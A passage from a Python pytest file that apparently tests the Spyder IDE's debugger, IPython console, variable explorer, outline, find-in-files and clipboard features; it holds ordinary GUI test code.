test_file2 = folder.join('tmp2.py')
test_file2.write(code2)
# Run tmp2 and get an error
with qtbot.waitSignal(shell.executed):
shell.execute('runfile("' + str(test_file2).replace("\\", "/") +
'", wdir="' + str(folder).replace("\\", "/") + '")')
assert '1/0' in control.toPlainText()
# Replace QApplication.processEvents to make sure it is not called
super_processEvents = QApplication.processEvents
def processEvents():
processEvents.called = True
return super_processEvents()
processEvents.called = False
try:
QApplication.processEvents = processEvents
# Debug and open both files
with qtbot.waitSignal(shell.executed):
shell.execute('%debug')
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!u')
qtbot.keyClick(control, Qt.Key_Enter)
# Wait until both files are open
qtbot.waitUntil(
lambda: osp.normpath(str(test_file)) in [
osp.normpath(p) for p in main_window.editor.get_filenames()])
qtbot.waitUntil(
lambda: str(test_file2) in [
osp.normpath(p) for p in main_window.editor.get_filenames()])
# Make sure the events are not processed.
assert not processEvents.called
finally:
QApplication.processEvents = super_processEvents
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="It times out on macOS")
@pytest.mark.parametrize(
"where", [True, False])
def test_pdb_step(main_window, qtbot, tmpdir, where):
"""
Check that pdb notify Spyder only moves when a new line is reached.
"""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = shell._control
# Write code to a file
code1 = ("def a():\n"
" 1/0")
code2 = ("from tmp import a\n"
"a()")
folder = tmpdir.join('tmp_folder')
test_file = folder.join('tmp.py')
test_file.write(code1, ensure=True)
test_file2 = folder.join('tmp2.py')
test_file2.write(code2)
# Run tmp2 and get an error
with qtbot.waitSignal(shell.executed):
shell.execute('runfile("' + str(test_file2).replace("\\", "/") +
'", wdir="' + str(folder).replace("\\", "/") + '")')
qtbot.wait(1000)
assert '1/0' in control.toPlainText()
# Debug and enter first file
with qtbot.waitSignal(shell.executed):
shell.execute('%debug')
qtbot.waitUntil(
lambda: osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file)))
# Move to another file
main_window.editor.new()
qtbot.wait(100)
assert main_window.editor.get_current_editor().filename != str(test_file)
current_filename = main_window.editor.get_current_editor().filename
# Run a random command, make sure we don't move
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!a')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
assert current_filename == main_window.editor.get_current_editor().filename
# Go up and enter second file
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!u')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file2)))
# Go back to first file
editor_stack = main_window.editor.get_current_editorstack()
index = editor_stack.has_filename(str(test_file))
assert index is not None
editor_stack.set_stack_index(index)
assert osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file))
if where:
# go back to the second file with where
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!w')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
# Make sure we moved
assert osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file2))
else:
# Stay at the same place
with qtbot.waitSignal(shell.executed):
qtbot.keyClicks(control, '!a')
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.wait(1000)
# Make sure we didn't move
assert osp.samefile(
main_window.editor.get_current_editor().filename,
str(test_file))
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin',
reason="Fails sometimes on macOS")
def test_runcell_after_restart(main_window, qtbot):
"""Test runcell after a kernel restart."""
# Write code to a file
code = "print('test_runcell_after_restart')"
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
# Restart Kernel
with qtbot.waitSignal(shell.sig_prompt_ready, timeout=10000):
shell.ipyclient.restart_kernel()
# call runcell
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Return, modifier=Qt.ShiftModifier)
qtbot.waitUntil(
lambda: "test_runcell_after_restart" in shell._control.toPlainText())
# Make sure no errors are shown
assert "error" not in shell._control.toPlainText().lower()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform.startswith('linux'),
reason="It fails sometimes on Linux")
@pytest.mark.parametrize(
"ipython", [True, False])
@pytest.mark.parametrize(
"test_cell_magic", [True, False])
def test_ipython_magic(main_window, qtbot, tmpdir, ipython, test_cell_magic):
"""Test the runcell command with cell magic."""
# Write code with a cell to a file
write_file = tmpdir.mkdir("foo").join("bar.txt")
assert not osp.exists(to_text_string(write_file))
if test_cell_magic:
code = "\n\n%%writefile " + to_text_string(write_file) + "\ntest\n"
else:
code = "\n\n%debug print()"
if ipython:
fn = "cell-test.ipy"
else:
fn = "cell-test.py"
p = tmpdir.join(fn)
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Execute runcell
with qtbot.waitSignal(shell.executed):
shell.execute("runcell(0, r'{}')".format(to_text_string(p)))
control = main_window.ipyconsole.get_widget().get_focus_widget()
error_text = 'save this file with the .ipy extension'
try:
if ipython:
if test_cell_magic:
qtbot.waitUntil(
lambda: 'Writing' in control.toPlainText())
# Verify that the code was executed
assert osp.exists(to_text_string(write_file))
else:
qtbot.waitSignal(shell.executed)
assert error_text not in control.toPlainText()
else:
qtbot.waitUntil(lambda: error_text in control.toPlainText())
finally:
if osp.exists(to_text_string(write_file)):
os.remove(to_text_string(write_file))
@pytest.mark.slow
@flaky(max_runs=3)
def test_running_namespace(main_window, qtbot, tmpdir):
"""
Test that the running namespace is correctly sent when debugging in a
new namespace.
"""
code = ("def test(a):\n print('a:',a)\na = 10\ntest(5)")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
code_editor.debugger.toogle_breakpoint(line_number=2)
# Write b in the namespace
with qtbot.waitSignal(shell.executed):
shell.execute('b = 10')
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: 'b' in nsb.editor.source_model._data)
assert nsb.editor.source_model._data['b']['view'] == '10'
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# b should not be there (running namespace) and the local a should be 5
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data and
nsb.editor.source_model._data['a']['view'] == '5',
timeout=3000)
assert 'b' not in nsb.editor.source_model._data
assert nsb.editor.source_model._data['a']['view'] == '5'
qtbot.waitUntil(shell.is_waiting_pdb_input)
with qtbot.waitSignal(shell.executed):
shell.pdb_execute('!c')
# At the end, b should be back and a should be 10
qtbot.waitUntil(lambda: 'b' in nsb.editor.source_model._data)
assert nsb.editor.source_model._data['a']['view'] == '10'
assert nsb.editor.source_model._data['b']['view'] == '10'
@pytest.mark.slow
@flaky(max_runs=3)
def test_post_mortem(main_window, qtbot, tmpdir):
"""Test post mortem works"""
# Check we can use custom complete for pdb
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = main_window.ipyconsole.get_widget().get_focus_widget()
test_file = tmpdir.join('test.py')
test_file.write('raise RuntimeError\n')
with qtbot.waitSignal(shell.executed):
shell.execute(
"runfile(" + repr(str(test_file)) + ", post_mortem=True)")
assert "IPdb [" in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
def test_run_unsaved_file_multiprocessing(main_window, qtbot):
"""Test that we can run an unsaved file with multiprocessing."""
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
run_action = main_window.run_toolbar_actions[0]
run_button = main_window.run_toolbar.widgetForAction(run_action)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(
"import multiprocessing\n"
"import traceback\n"
'if __name__ is "__main__":\n'
" p = multiprocessing.Process(target=traceback.print_exc)\n"
" p.start()\n"
" p.join()\n"
)
# This code should run even on windows
# Start running
qtbot.mouseClick(run_button, Qt.LeftButton)
# Because multiprocessing is behaving strangly on windows, only some
# situations will work. This is one of these situations so it shouldn't
# be broken.
if os.name == 'nt':
qtbot.waitUntil(
lambda: "Warning: multiprocessing" in shell._control.toPlainText())
else:
# There is no exception, so the exception is None
qtbot.waitUntil(
lambda: 'None' in shell._control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_cleared_after_kernel_restart(main_window, qtbot):
"""
Test that the variable explorer is cleared after a kernel restart.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create a variable
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert the value is shown in the variable explorer
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data,
timeout=3000)
# Restart Kernel
with qtbot.waitSignal(shell.sig_prompt_ready, timeout=10000):
shell.ipyclient.restart_kernel()
# Assert the value was removed
qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data,
timeout=3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_varexp_cleared_after_reset(main_window, qtbot):
"""
Test that the variable explorer is cleared after triggering a
reset in the IPython console and variable explorer panes.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create a variable
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert the value is shown in the variable explorer
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data,
timeout=3000)
# Trigger a reset in the variable explorer
nsb.reset_namespace()
# Assert the value was removed
qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data,
timeout=3000)
# Create the variable again
with qtbot.waitSignal(shell.executed):
shell.execute('a = 10')
# Assert the value is shown in the variable explorer
nsb = main_window.variableexplorer.current_widget()
qtbot.waitUntil(lambda: 'a' in nsb.editor.source_model._data,
timeout=3000)
# Trigger a reset in the console
shell.ipyclient.reset_namespace()
# Assert the value was removed
qtbot.waitUntil(lambda: 'a' not in nsb.editor.source_model._data,
timeout=3000)
@pytest.mark.slow
@flaky(max_runs=3)
def test_immediate_debug(main_window, qtbot):
"""
Check if we can enter debugging immediately
"""
shell = main_window.ipyconsole.get_current_shellwidget()
with qtbot.waitSignal(shell.executed, timeout=SHELL_TIMEOUT):
shell.execute("%debug print()")
@pytest.mark.slow
@flaky(max_runs=3)
def test_local_namespace(main_window, qtbot, tmpdir):
"""
Test that the local namespace is not reset.
This can happen if `frame.f_locals` is called on the current frame, as this
has the side effect of discarding the pdb locals.
"""
code = ("""
def hello():
test = 1
print('test ==', test)
hello()
""")
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
code_editor.debugger.toogle_breakpoint(line_number=4)
nsb = main_window.variableexplorer.current_widget()
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# Check `test` has a value of 1
# Here we use "waitUntil" because `shell.executed` is emitted twice
# One at the beginning of the file, and once at the breakpoint
qtbot.waitUntil(lambda: 'test' in nsb.editor.source_model._data and
nsb.editor.source_model._data['test']['view'] == '1',
timeout=3000)
# change value of test
with qtbot.waitSignal(shell.executed):
shell.execute("test = 1 + 1")
# check value of test
with qtbot.waitSignal(shell.executed):
shell.execute("print('test =', test)")
assert "test = 2" in shell._control.toPlainText()
# change value of test
with qtbot.waitSignal(shell.executed):
shell.execute("test = 1 + 1 + 1")
# do next
with qtbot.waitSignal(shell.executed):
shell.pdb_execute("!next")
assert "test == 3" in shell._control.toPlainText()
# Check the namespace browser is updated
assert ('test' in nsb.editor.source_model._data and
nsb.editor.source_model._data['test']['view'] == '3')
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.preload_project
@pytest.mark.skipif(os.name == 'nt', reason='Times out on Windows')
def test_ordering_lsp_requests_at_startup(main_window, qtbot):
"""
Test the ordering of requests we send to the LSP at startup when a
project was left open during the previous session.
This is a regression test for spyder-ide/spyder#13351.
"""
# Wait until the LSP server is up.
code_editor = main_window.editor.get_current_editor()
qtbot.waitSignal(code_editor.completions_response_signal, timeout=30000)
# Wait until the initial requests are sent to the server.
lsp = main_window.completions.get_provider('lsp')
python_client = lsp.clients['python']
qtbot.wait(5000)
expected_requests = [
'initialize',
'initialized',
'workspace/didChangeConfiguration',
'workspace/didChangeWorkspaceFolders',
'textDocument/didOpen',
]
skip_intermediate = {
'initialized': {'workspace/didChangeConfiguration'}
}
lsp_requests = python_client['instance']._requests
start_idx = lsp_requests.index((0, 'initialize'))
request_order = []
expected_iter = iter(expected_requests)
current_expected = next(expected_iter)
for i in range(start_idx, len(lsp_requests)):
if current_expected is None:
break
_, req_type = lsp_requests[i]
if req_type == current_expected:
request_order.append(req_type)
current_expected = next(expected_iter, None)
else:
skip_set = skip_intermediate.get(current_expected, set({}))
if req_type in skip_set:
continue
else:
assert req_type == current_expected
assert request_order == expected_requests
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize(
'main_window',
[{'spy_config': ('tours', 'show_tour_message', 2)}],
indirect=True)
def test_tour_message(main_window, qtbot):
"""Test that the tour message displays and sends users to the tour."""
# Wait until window setup is finished, which is when the message appears
tours = main_window.get_plugin(Plugins.Tours)
tour_dialog = tours.get_container()._tour_dialog
animated_tour = tours.get_container()._tour_widget
qtbot.waitSignal(main_window.sig_setup_finished, timeout=30000)
# Check that tour is shown automatically and manually show it
assert tours.get_conf('show_tour_message')
tours.show_tour_message(force=True)
# Wait for the message to appear
qtbot.waitUntil(lambda: bool(tour_dialog), timeout=5000)
qtbot.waitUntil(lambda: tour_dialog.isVisible(), timeout=2000)
# Check that clicking dismiss hides the dialog and disables it
qtbot.mouseClick(tour_dialog.dismiss_button, Qt.LeftButton)
qtbot.waitUntil(lambda: not tour_dialog.isVisible(),
timeout=2000)
assert not tours.get_conf('show_tour_message')
# Confirm that calling show_tour_message() normally doesn't show it again
tours.show_tour_message()
qtbot.wait(2000)
assert not tour_dialog.isVisible()
# Ensure that it opens again with force=True
tours.show_tour_message(force=True)
qtbot.waitUntil(lambda: tour_dialog.isVisible(), timeout=5000)
# Run the tour and confirm it's running and the dialog is closed
qtbot.mouseClick(tour_dialog.launch_tour_button, Qt.LeftButton)
qtbot.waitUntil(lambda: animated_tour.is_running, timeout=9000)
assert not tour_dialog.isVisible()
assert not tours.get_conf('show_tour_message')
# Close the tour
animated_tour.close_tour()
qtbot.waitUntil(lambda: not animated_tour.is_running, timeout=9000)
tour_dialog.hide()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.preload_complex_project
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Only works on Linux")
def test_update_outline(main_window, qtbot, tmpdir):
"""
Test that files in the Outline pane are updated at startup and
after switching projects.
"""
# Show outline explorer
outline_explorer = main_window.outlineexplorer
outline_explorer.toggle_view_action.setChecked(True)
# Get Python editor trees
treewidget = outline_explorer.get_widget().treewidget
editors_py = [
editor for editor in treewidget.editor_ids.keys()
if editor.get_language() == 'Python'
]
def editor_filled():
return all(
[
len(treewidget.editor_tree_cache[editor.get_id()]) == 4
for editor in editors_py
]
)
# Wait a bit for trees to be filled
qtbot.waitUntil(editor_filled, timeout=25000)
# Assert all Python editors are filled
assert editor_filled()
# Split editor
editorstack = main_window.editor.get_current_editorstack()
editorstack.sig_split_vertically.emit()
qtbot.wait(1000)
# Select file with no outline in split editorstack
editorstack = main_window.editor.get_current_editorstack()
editorstack.set_stack_index(2)
editor = editorstack.get_current_editor()
assert osp.splitext(editor.filename)[1] == '.txt'
assert editor.is_cloned
# Assert tree is empty
editor_tree = treewidget.current_editor
tree = treewidget.editor_tree_cache[editor_tree.get_id()]
assert len(tree) == 0
# Assert spinner is not shown
assert not outline_explorer.get_widget()._spinner.isSpinning()
# Hide outline from view
outline_explorer.toggle_view_action.setChecked(False)
# Remove content from first file
editorstack.set_stack_index(0)
editor = editorstack.get_current_editor()
editor.selectAll()
editor.cut()
editorstack.save(index=0)
# Assert outline was not updated
qtbot.wait(1000)
len(treewidget.editor_tree_cache[treewidget.current_editor.get_id()]) == 4
# Set some files as session without projects
prev_filenames = ["prev_file_1.py", "prev_file_2.py"]
prev_paths = []
for fname in prev_filenames:
file = tmpdir.join(fname)
file.write(read_asset_file("script_outline_1.py"))
prev_paths.append(str(file))
CONF.set('editor', 'filenames', prev_paths)
# Close project to open that file automatically
main_window.projects.close_project()
# Show outline again
outline_explorer.toggle_view_action.setChecked(True)
def editor_filled():
return all(
[
len(treewidget.editor_tree_cache[editor.get_id()]) == 4
for editor in treewidget.editor_ids.keys()
]
)
# Wait a bit for trees to be filled
qtbot.waitUntil(editor_filled, timeout=3000)
# Assert all Python editors are filled
assert editor_filled()
# Remove test file from session
CONF.set('editor', 'filenames', [])
@pytest.mark.slow
@flaky(max_runs=3)
def test_prevent_closing(main_window, qtbot):
"""
Check we can bypass prevent closing.
"""
code = "print(1 + 6)\nprint(1 + 6)\n"
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
code_editor.debugger.toogle_breakpoint(line_number=1)
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
CONF.set('ipython_console', 'pdb_prevent_closing', False)
# Check we can close a file we debug if the option is disabled
assert main_window.editor.get_current_editorstack().close_file()
CONF.set('ipython_console', 'pdb_prevent_closing', True)
# Check we are still debugging
assert shell.is_debugging()
@pytest.mark.slow
@flaky(max_runs=3)
def test_continue_first_line(main_window, qtbot):
"""
Check we can bypass prevent closing.
"""
code = "print('a =', 1 + 6)\nprint('b =', 1 + 8)\n"
# Wait until the window is fully up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Main variables
debug_action = main_window.debug_toolbar_actions[0]
debug_button = main_window.debug_toolbar.widgetForAction(debug_action)
# Clear all breakpoints
main_window.editor.clear_all_breakpoints()
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
CONF.set('ipython_console', 'pdb_stop_first_line', False)
# Start debugging
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(debug_button, Qt.LeftButton)
# The debugging should finish
qtbot.waitUntil(lambda: not shell.is_debugging())
CONF.set('ipython_console', 'pdb_stop_first_line', True)
# Check everything was executed
qtbot.waitUntil(lambda: "a = 7" in shell._control.toPlainText())
assert "b = 9" in shell._control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.use_introspection
@pytest.mark.skipif(os.name == 'nt', reason="Fails on Windows")
def test_outline_no_init(main_window, qtbot):
# Open file in one of our directories without an __init__ file
spy_dir = osp.dirname(get_module_path('spyder'))
main_window.editor.load(osp.join(spy_dir, 'tools', 'rm_whitespace.py'))
# Show outline explorer
outline_explorer = main_window.outlineexplorer
outline_explorer.toggle_view_action.setChecked(True)
# Wait a bit for trees to be filled
qtbot.wait(5000)
# Get tree length
treewidget = outline_explorer.get_widget().treewidget
editor_id = list(treewidget.editor_ids.values())[1]
# Assert symbols in the file are detected and shown
assert len(treewidget.editor_tree_cache[editor_id]) > 0
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform.startswith('linux'),
reason="Flaky on Linux")
def test_pdb_without_comm(main_window, qtbot):
"""Check if pdb works without comm."""
ipyconsole = main_window.ipyconsole
shell = ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = ipyconsole.get_widget().get_focus_widget()
with qtbot.waitSignal(shell.executed):
shell.execute("get_ipython().kernel.frontend_comm.close()")
shell.execute("%debug print()")
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
qtbot.keyClicks(control, "print('Two: ' + str(1+1))")
qtbot.keyClick(control, Qt.Key_Enter)
qtbot.waitUntil(
lambda: shell._control.toPlainText().split()[-1] == 'ipdb>')
assert "Two: 2" in control.toPlainText()
# Press step button and expect a sig_pdb_step signal
with qtbot.waitSignal(shell.sig_pdb_step):
main_window.editor.debug_command("step")
# Stop debugging and expect an executed signal
with qtbot.waitSignal(shell.executed):
main_window.editor.stop_debugging()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Flaky on Mac and Windows")
def test_print_comms(main_window, qtbot):
"""Test warning printed when comms print."""
# Write code with a cell to a file
code = ("class Test:\n @property\n def shape(self):"
"\n print((10,))")
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = main_window.ipyconsole.get_widget().get_focus_widget()
nsb = main_window.variableexplorer.current_widget()
# Create some output from spyder call
with qtbot.waitSignal(shell.executed):
shell.execute(code)
assert nsb.editor.source_model.rowCount() == 0
with qtbot.waitSignal(shell.executed):
shell.execute("a = Test()")
# Wait until the object has appeared in the variable explorer
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 1,
timeout=EVAL_TIMEOUT)
# Make sure the warning is printed
assert ("Output from spyder call 'get_namespace_view':"
in control.toPlainText())
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="UTF8 on Windows")
def test_goto_find(main_window, qtbot, tmpdir):
"""Test find goes to the right place."""
# Use UTF8 only character to make sure positions are respected
code = "we Weee wee\nWe\n🚫 wee"
match_positions = [
(0, 2),
(3, 7),
(8, 11),
(12, 14),
(18, 21)
]
subdir = tmpdir.mkdir("find-sub")
p = subdir.join("find-test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
code_editor = main_window.editor.get_focus_widget()
main_window.explorer.chdir(str(subdir))
main_window.findinfiles.switch_to_plugin()
findinfiles = main_window.findinfiles.get_widget()
findinfiles.set_search_text("we+")
findinfiles.search_regexp_action.setChecked(True)
findinfiles.case_action.setChecked(False)
with qtbot.waitSignal(findinfiles.sig_finished, timeout=SHELL_TIMEOUT):
findinfiles.find()
results = findinfiles.result_browser.data
assert len(results) == 5
assert len(findinfiles.result_browser.files) == 1
file_item = list(findinfiles.result_browser.files.values())[0]
assert file_item.childCount() == 5
for i in range(5):
item = file_item.child(i)
findinfiles.result_browser.setCurrentItem(item)
findinfiles.result_browser.activated(item)
cursor = code_editor.textCursor()
position = (cursor.selectionStart(), cursor.selectionEnd())
assert position == match_positions[i]
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
os.name == 'nt',
reason="test fails on windows.")
def test_copy_paste(main_window, qtbot, tmpdir):
"""Test copy paste."""
code = (
"if True:\n"
" class a():\n"
" def b():\n"
" print()\n"
" def c():\n"
" print()\n"
)
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# create new file
main_window.editor.new()
code_editor = main_window.editor.get_focus_widget()
code_editor.set_text(code)
# Test copy
cursor = code_editor.textCursor()
cursor.setPosition(69)
cursor.movePosition(QTextCursor.End,
QTextCursor.KeepAnchor)
code_editor.setTextCursor(cursor)
qtbot.keyClick(code_editor, "c", modifier=Qt.ControlModifier)
assert QApplication.clipboard().text() == (
"def c():\n print()\n")
assert CLIPBOARD_HELPER.metadata_indent == 8
# Test paste in console
qtbot.keyClick(shell._control, "v", modifier=Qt.ControlModifier)
expected = "In [1]: def c():\n ...: print()"
assert expected in shell._control.toPlainText()
# Test paste at zero indentation
qtbot.keyClick(code_editor, Qt.Key_Backspace)
qtbot.keyClick(code_editor, Qt.Key_Backspace)
qtbot.keyClick(code_editor, Qt.Key_Backspace)
# Check again that the clipboard is ready
assert QApplication.clipboard().text() == (
"def c():\n print()\n")
assert CLIPBOARD_HELPER.metadata_indent == 8
qtbot.keyClick(code_editor, "v", modifier=Qt.ControlModifier)
assert "\ndef c():\n print()" in code_editor.toPlainText()
# Test paste at automatic indentation
qtbot.keyClick(code_editor, "z", modifier=Qt.ControlModifier)
qtbot.keyClick(code_editor, Qt.Key_Tab)
qtbot.keyClick(code_editor, "v", modifier=Qt.ControlModifier)
expected = (
"\n"
" def c():\n"
" print()\n"
)
assert expected in code_editor.toPlainText()
@pytest.mark.slow
@pytest.mark.skipif(not running_in_ci(), reason="Only works in CIs")
def test_add_external_plugins_to_dependencies(main_window):
"""Test that we register external plugins in the main window."""
external_names = []
for dep in DEPENDENCIES:
name = getattr(dep, 'package_name', None)
if name:
external_names.append(name)
assert 'spyder-boilerplate' in external_names
@pytest.mark.slow
@flaky(max_runs=3)
def test_print_multiprocessing(main_window, qtbot, tmpdir):
"""Test print commands from multiprocessing."""
# Write code with a cell to a file
code = """
import multiprocessing
import sys
def test_func():
print("Test stdout")
print("Test stderr", file=sys.stderr)
if __name__ == "__main__":
p = multiprocessing.Process(target=test_func)
p.start()
p.join()
"""
p = tmpdir.join("print-test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = main_window.ipyconsole.get_widget().get_focus_widget()
# Click the run button
run_action = main_window.run_toolbar_actions[0]
run_button = main_window.run_toolbar.widgetForAction(run_action)
with qtbot.waitSignal(shell.executed):
qtbot.mouseClick(run_button, Qt.LeftButton)
qtbot.wait(1000)
assert 'Test stdout' in control.toPlainText()
assert 'Test stderr' in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
os.name == 'nt',
reason="ctypes.string_at(0) doesn't segfaults on Windows")
def test_print_faulthandler(main_window, qtbot, tmpdir):
"""Test printing segfault info from kernel crashes."""
# Write code with a cell to a file
code = """
def crash_func():
import ctypes; ctypes.string_at(0)
crash_func()
"""
p = tmpdir.join("print-test.py")
p.write(code)
main_window.editor.load(to_text_string(p))
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = main_window.ipyconsole.get_widget().get_focus_widget()
# Click the run button
run_action = main_window.run_toolbar_actions[0]
run_button = main_window.run_toolbar.widgetForAction(run_action)
qtbot.mouseClick(run_button, Qt.LeftButton)
qtbot.wait(5000)
assert 'Segmentation fault' in control.toPlainText()
assert 'in crash_func' in control.toPlainText()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt', reason="Tour messes up focus on Windows")
@pytest.mark.parametrize("focus_to_editor", [True, False])
@pytest.mark.skipif(os.name == 'nt', reason="Fails on Windows")
def test_focus_to_editor(main_window, qtbot, tmpdir, focus_to_editor):
"""Test that the focus_to_editor option works as expected."""
# Write code with cells to a file
code = """# %%
def foo(x):
return 2 * x
# %%
foo(1)
"""
p = tmpdir.join("test.py")
p.write(code)
# Load code in the editor
main_window.editor.load(to_text_string(p))
# Change focus_to_editor option
main_window.editor.set_option('focus_to_editor', focus_to_editor)
main_window.editor.apply_plugin_settings({'focus_to_editor'})
code_editor = main_window.editor.get_current_editor()
# Wait for the console to be up
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
control = main_window.ipyconsole.get_widget().get_focus_widget()
# Be sure the focus is on the editor before proceeding
code_editor.setFocus()
assert QApplication.focusWidget() is code_editor
# Select the run cell button to click it
run_cell_action = main_window.run_toolbar_actions[1]
run_cell_button = main_window.run_toolbar.widgetForAction(run_cell_action)
# Make sure we don't switch to the console after pressing the button
if focus_to_editor:
with qtbot.assertNotEmitted(
main_window.ipyconsole.sig_switch_to_plugin_requested, wait=1000
):
qtbot.mouseClick(run_cell_button, Qt.LeftButton)
else:
qtbot.mouseClick(run_cell_button, Qt.LeftButton)
qtbot.wait(1000)
# Check the right widget has focus
focus_widget = QApplication.focusWidget()
if focus_to_editor:
assert focus_widget is code_editor
else:
assert focus_widget is control
# Give focus back to the editor before running the next test
if not focus_to_editor:
code_editor.setFocus()
# Move cursor to last line to run it
cursor = code_editor.textCursor()
